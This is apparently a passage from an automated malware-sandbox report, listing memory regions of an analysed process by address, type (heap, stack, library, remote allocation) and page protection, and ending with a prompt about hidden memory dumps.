||
|
1AB7B091000
|
heap
|
page read and write
|
||
|
1C361AC6000
|
heap
|
page read and write
|
||
|
1C361A98000
|
heap
|
page read and write
|
||
|
3FECDFE000
|
stack
|
page read and write
|
||
|
1AB630B2000
|
trusted library allocation
|
page read and write
|
||
|
48D1000
|
trusted library allocation
|
page read and write
|
||
|
841B000
|
heap
|
page read and write
|
||
|
1C35FCDE000
|
heap
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
1AB63264000
|
trusted library allocation
|
page read and write
|
||
|
1AB637F1000
|
trusted library allocation
|
page read and write
|
||
|
2F00000
|
remote allocation
|
page execute and read and write
|
||
|
48A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
1C35FC10000
|
heap
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
22DA0000
|
remote allocation
|
page read and write
|
||
|
73CEF000
|
unkown
|
page readonly
|
||
|
6E50000
|
direct allocation
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
22670000
|
direct allocation
|
page read and write
|
||
|
1C35FD96000
|
heap
|
page read and write
|
||
|
1C35FD6C000
|
heap
|
page read and write
|
||
|
1AB7B0BD000
|
heap
|
page read and write
|
||
|
1AB62E58000
|
trusted library allocation
|
page read and write
|
||
|
6E30000
|
direct allocation
|
page read and write
|
||
|
C296000
|
direct allocation
|
page execute and read and write
|
||
|
8240000
|
trusted library allocation
|
page read and write
|
||
|
5876000
|
remote allocation
|
page execute and read and write
|
||
|
1C35FD70000
|
heap
|
page read and write
|
||
|
4A28000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC33C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C35FCCF000
|
heap
|
page read and write
|
||
|
1C35FD87000
|
heap
|
page read and write
|
||
|
1C360005000
|
heap
|
page read and write
|
||
|
1AB63808000
|
trusted library allocation
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
7DF495D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C35FD0F000
|
heap
|
page read and write
|
||
|
6EE0000
|
direct allocation
|
page read and write
|
||
|
1AB60FAA000
|
heap
|
page read and write
|
||
|
1C361AC6000
|
heap
|
page read and write
|
||
|
1AB630BD000
|
trusted library allocation
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
777B000
|
heap
|
page read and write
|
||
|
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
|
22DDE000
|
stack
|
page read and write
|
||
|
A13AAFE000
|
stack
|
page read and write
|
||
|
1C35FCCB000
|
heap
|
page read and write
|
||
|
1AB7B08F000
|
heap
|
page read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
|
1AB60EF0000
|
heap
|
page read and write
|
||
|
844E000
|
heap
|
page read and write
|
||
|
8140000
|
trusted library allocation
|
page execute and read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
|
1C361AC6000
|
heap
|
page read and write
|
||
|
7708000
|
heap
|
page read and write
|
||
|
1AB60F00000
|
heap
|
page read and write
|
||
|
6C8E000
|
stack
|
page read and write
|
||
|
1AB637DA000
|
trusted library allocation
|
page read and write
|
||
|
7774000
|
heap
|
page read and write
|
||
|
B896000
|
direct allocation
|
page execute and read and write
|
||
|
76C0000
|
heap
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
7735000
|
heap
|
page read and write
|
||
|
58D1000
|
trusted library allocation
|
page read and write
|
||
|
76C8000
|
heap
|
page read and write
|
||
|
A13AB7E000
|
stack
|
page read and write
|
||
|
593A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC440000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D0E000
|
stack
|
page read and write
|
||
|
22CA0000
|
heap
|
page read and write
|
||
|
226B0000
|
direct allocation
|
page read and write
|
||
|
1AB6488E000
|
trusted library allocation
|
page read and write
|
||
|
70A0000
|
heap
|
page read and write
|
||
|
8310000
|
heap
|
page read and write
|
||
|
75B0000
|
heap
|
page read and write
|
||
|
1C361740000
|
heap
|
page read and write
|
||
|
1AB630D5000
|
trusted library allocation
|
page read and write
|
||
|
1AB632FE000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC465000
|
trusted library allocation
|
page read and write
|
||
|
744A000
|
heap
|
page read and write
|
||
|
7FFAAC3A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB630C1000
|
trusted library allocation
|
page read and write
|
||
|
1C35FD9E000
|
heap
|
page read and write
|
||
|
4725000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB62CB5000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC282000
|
trusted library allocation
|
page read and write
|
||
|
73DD000
|
heap
|
page read and write
|
||
|
1AB72C51000
|
trusted library allocation
|
page read and write
|
||
|
6276000
|
remote allocation
|
page execute and read and write
|
||
|
7FFAAC467000
|
trusted library allocation
|
page read and write
|
||
|
AE96000
|
direct allocation
|
page execute and read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
|
7779000
|
heap
|
page read and write
|
||
|
A13AEB6000
|
stack
|
page read and write
|
||
|
7735000
|
heap
|
page read and write
|
||
|
A13AFBB000
|
stack
|
page read and write
|
||
|
1C361AA0000
|
heap
|
page read and write
|
||
|
4E76000
|
remote allocation
|
page execute and read and write
|
||
|
1AB7B308000
|
heap
|
page read and write
|
||
|
1AB64866000
|
trusted library allocation
|
page read and write
|
||
|
1AB62960000
|
trusted library allocation
|
page read and write
|
||
|
8890000
|
direct allocation
|
page read and write
|
||
|
46F0000
|
trusted library allocation
|
page read and write
|
||
|
6D4F000
|
stack
|
page read and write
|
||
|
1C35FCA0000
|
heap
|
page read and write
|
||
|
1AB62990000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page read and write
|
||
|
1AB60F77000
|
heap
|
page read and write
|
||
|
6E20000
|
direct allocation
|
page read and write
|
||
|
8880000
|
direct allocation
|
page read and write
|
||
|
75A0000
|
heap
|
page read and write
|
||
|
1C361BFF000
|
heap
|
page read and write
|
||
|
1AB62AC8000
|
heap
|
page read and write
|
||
|
1C35FD7D000
|
heap
|
page read and write
|
||
|
7379000
|
heap
|
page read and write
|
||
|
1AB7B270000
|
heap
|
page read and write
|
||
|
1C361BB4000
|
heap
|
page read and write
|
||
|
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
|
A13BD0D000
|
stack
|
page read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
22690000
|
direct allocation
|
page read and write
|
||
|
1C35FD99000
|
heap
|
page read and write
|
||
|
A13BC8F000
|
stack
|
page read and write
|
||
|
6E60000
|
direct allocation
|
page read and write
|
||
|
2EE0000
|
trusted library section
|
page read and write
|
||
|
83F8000
|
heap
|
page read and write
|
||
|
8160000
|
trusted library allocation
|
page read and write
|
||
|
479E000
|
stack
|
page read and write
|
||
|
7680000
|
direct allocation
|
page read and write
|
||
|
1C35FD01000
|
heap
|
page read and write
|
||
|
A13ACFE000
|
stack
|
page read and write
|
||
|
1C35FD7D000
|
heap
|
page read and write
|
||
|
1AB62AB0000
|
heap
|
page read and write
|
||
|
7FFAAC340000
|
trusted library allocation
|
page execute and read and write
|
||
|
8250000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC28D000
|
trusted library allocation
|
page execute and read and write
|
||
|
CC96000
|
direct allocation
|
page execute and read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
|
862C000
|
stack
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
845C000
|
heap
|
page read and write
|
||
|
46F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC4C0000
|
trusted library allocation
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
7737000
|
heap
|
page read and write
|
||
|
7FFAAC4E0000
|
trusted library allocation
|
page read and write
|
||
|
2D04000
|
heap
|
page read and write
|
||
|
1AB62920000
|
trusted library allocation
|
page read and write
|
||
|
1AB62950000
|
heap
|
page readonly
|
||
|
A13AD7E000
|
stack
|
page read and write
|
||
|
1AB648B5000
|
trusted library allocation
|
page read and write
|
||
|
1C35FD8B000
|
heap
|
page read and write
|
||
|
1AB7B30D000
|
heap
|
page read and write
|
||
|
489E000
|
stack
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
1C361AA3000
|
heap
|
page read and write
|
||
|
82C000
|
stack
|
page read and write
|
||
|
77AB000
|
stack
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
1AB7B130000
|
heap
|
page read and write
|
||
|
1C361AB7000
|
heap
|
page read and write
|
||
|
1AB648C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
1AB60FB4000
|
heap
|
page read and write
|
||
|
1AB72F2D000
|
trusted library allocation
|
page read and write
|
||
|
8260000
|
trusted library allocation
|
page read and write
|
||
|
58F9000
|
trusted library allocation
|
page read and write
|
||
|
A13AE3F000
|
stack
|
page read and write
|
||
|
5A79000
|
trusted library allocation
|
page read and write
|
||
|
73CED000
|
unkown
|
page read and write
|
||
|
4750000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B600000
|
heap
|
page read and write
|
||
|
1C361BF3000
|
heap
|
page read and write
|
||
|
1AB7B127000
|
heap
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
1AB60FA6000
|
heap
|
page read and write
|
||
|
22AAE000
|
stack
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
22EAD000
|
stack
|
page read and write
|
||
|
22C5E000
|
stack
|
page read and write
|
||
|
A13AC7E000
|
stack
|
page read and write
|
||
|
72DE000
|
stack
|
page read and write
|
||
|
737C000
|
heap
|
page read and write
|
||
|
1C361BC3000
|
heap
|
page read and write
|
||
|
A13B23B000
|
stack
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page execute and read and write
|
||
|
A13B0BE000
|
stack
|
page read and write
|
||
|
4720000
|
trusted library allocation
|
page read and write
|
||
|
471A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7B122000
|
heap
|
page read and write
|
||
|
7FFAAC29B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
1AB62C31000
|
trusted library allocation
|
page read and write
|
||
|
2C7D000
|
heap
|
page read and write
|
||
|
1C35FD8E000
|
heap
|
page read and write
|
||
|
22BEC000
|
stack
|
page read and write
|
||
|
73A3000
|
heap
|
page read and write
|
||
|
73CD1000
|
unkown
|
page execute read
|
||
|
47FE000
|
stack
|
page read and write
|
||
|
1C361BC3000
|
heap
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page read and write
|
||
|
1C35FD9B000
|
heap
|
page read and write
|
||
|
1C361A94000
|
heap
|
page read and write
|
||
|
46FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C35FD8C000
|
heap
|
page read and write
|
||
|
1AB60FEE000
|
heap
|
page read and write
|
||
|
1AB61170000
|
heap
|
page read and write
|
||
|
1AB61175000
|
heap
|
page read and write
|
||
|
731E000
|
stack
|
page read and write
|
||
|
1AB6488A000
|
trusted library allocation
|
page read and write
|
||
|
8710000
|
trusted library allocation
|
page execute and read and write
|
||
|
769D000
|
stack
|
page read and write
|
||
|
7690000
|
direct allocation
|
page read and write
|
||
|
1C361AF7000
|
heap
|
page read and write
|
||
|
76B0000
|
heap
|
page read and write
|
||
|
1C35FD01000
|
heap
|
page read and write
|
||
|
7FFAAC283000
|
trusted library allocation
|
page execute and read and write
|
||
|
866C000
|
stack
|
page read and write
|
||
|
1C361AAB000
|
heap
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
22EB5000
|
direct allocation
|
page read and write
|
||
|
1C361ABA000
|
heap
|
page read and write
|
||
|
773A000
|
heap
|
page read and write
|
||
|
76A0000
|
direct allocation
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
A13AA7E000
|
stack
|
page read and write
|
||
|
6C40000
|
heap
|
page execute and read and write
|
||
|
1C35FD91000
|
heap
|
page read and write
|
||
|
1AB7B263000
|
heap
|
page read and write
|
||
|
1AB630C5000
|
trusted library allocation
|
page read and write
|
||
|
1C361AF7000
|
heap
|
page read and write
|
||
|
1C35FD77000
|
heap
|
page read and write
|
||
|
8305000
|
trusted library allocation
|
page read and write
|
||
|
1AB629D0000
|
trusted library allocation
|
page read and write
|
||
|
6D8E000
|
stack
|
page read and write
|
||
|
A13A7EE000
|
stack
|
page read and write
|
||
|
828B000
|
trusted library allocation
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
A13A763000
|
stack
|
page read and write
|
||
|
1C35FD7D000
|
heap
|
page read and write
|
||
|
46F4000
|
trusted library allocation
|
page read and write
|
||
|
7370000
|
heap
|
page read and write
|
||
|
75B5000
|
heap
|
page read and write
|
||
|
8441000
|
heap
|
page read and write
|
||
|
4808000
|
trusted library allocation
|
page read and write
|
||
|
2C60000
|
trusted library section
|
page read and write
|
||
|
2EFA000
|
heap
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page execute and read and write
|
||
|
226C0000
|
direct allocation
|
page read and write
|
||
|
1C35FCD0000
|
heap
|
page read and write
|
||
|
739A000
|
heap
|
page read and write
|
||
|
1C35FCCA000
|
heap
|
page read and write
|
||
|
1C361C08000
|
heap
|
page read and write
|
||
|
1C361AC6000
|
heap
|
page read and write
|
||
|
1C361AC6000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
47A0000
|
heap
|
page readonly
|
||
|
1C361BF8000
|
heap
|
page read and write
|
||
|
1AB7B034000
|
heap
|
page read and write
|
||
|
1AB60F20000
|
heap
|
page read and write
|
||
|
86D000
|
stack
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page read and write
|
||
|
47B0000
|
heap
|
page read and write
|
||
|
3FECCFD000
|
stack
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
1AB7B152000
|
heap
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
1AB648A2000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B0F1000
|
heap
|
page read and write
|
||
|
1AB72F1E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
73CD0000
|
unkown
|
page readonly
|
||
|
1AB62BD0000
|
heap
|
page execute and read and write
|
||
|
4934000
|
trusted library allocation
|
page read and write
|
||
|
1C361BB0000
|
heap
|
page read and write
|
||
|
7478000
|
trusted library allocation
|
page read and write
|
||
|
3FEC7FE000
|
stack
|
page read and write
|
||
|
81CE000
|
stack
|
page read and write
|
||
|
A13ABFC000
|
stack
|
page read and write
|
||
|
A13ADF8000
|
stack
|
page read and write
|
||
|
1C361AA3000
|
heap
|
page read and write
|
||
|
226E0000
|
direct allocation
|
page read and write
|
||
|
8456000
|
heap
|
page read and write
|
||
|
8137000
|
stack
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
|
1C361BCE000
|
heap
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
|
1AB60FAE000
|
heap
|
page read and write
|
||
|
4F33000
|
trusted library allocation
|
page read and write
|
||
|
3FECAFE000
|
stack
|
page read and write
|
||
|
48B0000
|
trusted library allocation
|
page read and write
|
||
|
48C0000
|
heap
|
page execute and read and write
|
||
|
A13B03E000
|
stack
|
page read and write
|
||
|
7FFAAC431000
|
trusted library allocation
|
page read and write
|
||
|
1AB6491F000
|
trusted library allocation
|
page read and write
|
||
|
1AB72C40000
|
trusted library allocation
|
page read and write
|
||
|
1AB60F60000
|
heap
|
page read and write
|
||
|
A13BD8B000
|
stack
|
page read and write
|
||
|
226F0000
|
direct allocation
|
page read and write
|
||
|
1AB61130000
|
heap
|
page read and write
|
||
|
1C361AC6000
|
heap
|
page read and write
|
||
|
6EA0000
|
direct allocation
|
page read and write
|
||
|
8417000
|
heap
|
page read and write
|
||
|
2ECB000
|
stack
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
1AB634E0000
|
trusted library allocation
|
page read and write
|
||
|
22C9F000
|
stack
|
page read and write
|
||
|
22E1F000
|
stack
|
page read and write
|
||
|
1C361BB5000
|
heap
|
page read and write
|
||
|
1AB7B027000
|
heap
|
page execute and read and write
|
||
|
3FEC9FF000
|
stack
|
page read and write
|
||
|
1AB72C31000
|
trusted library allocation
|
page read and write
|
||
|
1C361BD1000
|
heap
|
page read and write
|
||
|
1AB637F5000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
|
A13BC0E000
|
stack
|
page read and write
|
||
|
7F840000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C35FD32000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
1AB630A9000
|
trusted library allocation
|
page read and write
|
||
|
3A76000
|
remote allocation
|
page execute and read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
A13BE0B000
|
stack
|
page read and write
|
||
|
6DCE000
|
stack
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
1AB60FF4000
|
heap
|
page read and write
|
||
|
2E8C000
|
stack
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
6CCE000
|
stack
|
page read and write
|
||
|
83C0000
|
heap
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B2F7000
|
heap
|
page read and write
|
||
|
3FECFFB000
|
stack
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
1AB62AB5000
|
heap
|
page read and write
|
||
|
1AB7B230000
|
heap
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
4748000
|
heap
|
page read and write
|
||
|
1C35FD7D000
|
heap
|
page read and write
|
||
|
7FFAAC470000
|
trusted library allocation
|
page execute and read and write
|
||
|
88F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C361A9B000
|
heap
|
page read and write
|
||
|
8270000
|
trusted library allocation
|
page read and write
|
||
|
4476000
|
remote allocation
|
page execute and read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
A13B1BE000
|
stack
|
page read and write
|
||
|
9096000
|
direct allocation
|
page execute and read and write
|
||
|
1C35FCA9000
|
heap
|
page read and write
|
||
|
22AEF000
|
stack
|
page read and write
|
||
|
7721000
|
heap
|
page read and write
|
||
|
22B2D000
|
stack
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
1C361A90000
|
heap
|
page read and write
|
||
|
73B3000
|
heap
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
226D0000
|
direct allocation
|
page read and write
|
||
|
7440000
|
heap
|
page read and write
|
||
|
1C361BED000
|
heap
|
page read and write
|
||
|
1AB7B2E5000
|
heap
|
page read and write
|
||
|
1AB648B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC280000
|
trusted library allocation
|
page read and write
|
||
|
6C76000
|
remote allocation
|
page execute and read and write
|
||
|
7465000
|
heap
|
page read and write
|
||
|
3FEC6FE000
|
stack
|
page read and write
|
||
|
1C361C01000
|
heap
|
page read and write
|
||
|
1C361AA2000
|
heap
|
page read and write
|
||
|
1C35FBF0000
|
heap
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
8670000
|
heap
|
page read and write
|
||
|
1C35FD94000
|
heap
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
26E30000
|
direct allocation
|
page read and write
|
||
|
7FFAAC330000
|
trusted library allocation
|
page read and write
|
||
|
1AB6312C000
|
trusted library allocation
|
page read and write
|
||
|
1C361A95000
|
heap
|
page read and write
|
||
|
1C361C04000
|
heap
|
page read and write
|
||
|
1AB63128000
|
trusted library allocation
|
page read and write
|
||
|
1AB62A50000
|
heap
|
page execute and read and write
|
||
|
1AB63F65000
|
trusted library allocation
|
page read and write
|
||
|
1AB648AC000
|
trusted library allocation
|
page read and write
|
||
|
A13AF39000
|
stack
|
page read and write
|
||
|
3076000
|
remote allocation
|
page execute and read and write
|
||
|
1AB64937000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B2DB000
|
heap
|
page read and write
|
||
|
5A66000
|
trusted library allocation
|
page read and write
|
||
|
1AB648E1000
|
trusted library allocation
|
page read and write
|
||
|
8F20000
|
direct allocation
|
page execute and read and write
|
||
|
2939000
|
heap
|
page read and write
|
||
|
73F3000
|
heap
|
page read and write
|
||
|
1C360000000
|
heap
|
page read and write
|
||
|
8280000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B10A000
|
heap
|
page read and write
|
||
|
4722000
|
trusted library allocation
|
page read and write
|
||
|
74A2000
|
heap
|
page read and write
|
||
|
6EB0000
|
direct allocation
|
page read and write
|
||
|
7771000
|
heap
|
page read and write
|
||
|
3FECEFE000
|
stack
|
page read and write
|
||
|
1AB64B31000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
heap
|
page execute and read and write
|
||
|
1C361AA2000
|
heap
|
page read and write
|
||
|
22DA0000
|
remote allocation
|
page read and write
|
||
|
4709000
|
trusted library allocation
|
page read and write
|
||
|
A13B13E000
|
stack
|
page read and write
|
||
|
1C361AA2000
|
heap
|
page read and write
|
||
|
22CFE000
|
stack
|
page read and write
|
||
|
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
|
1AB62940000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC366000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
1AB630EA000
|
trusted library allocation
|
page read and write
|
||
|
22BAD000
|
stack
|
page read and write
|
||
|
2CB2000
|
heap
|
page read and write
|
There are 482 hidden memdumps, click here to show them.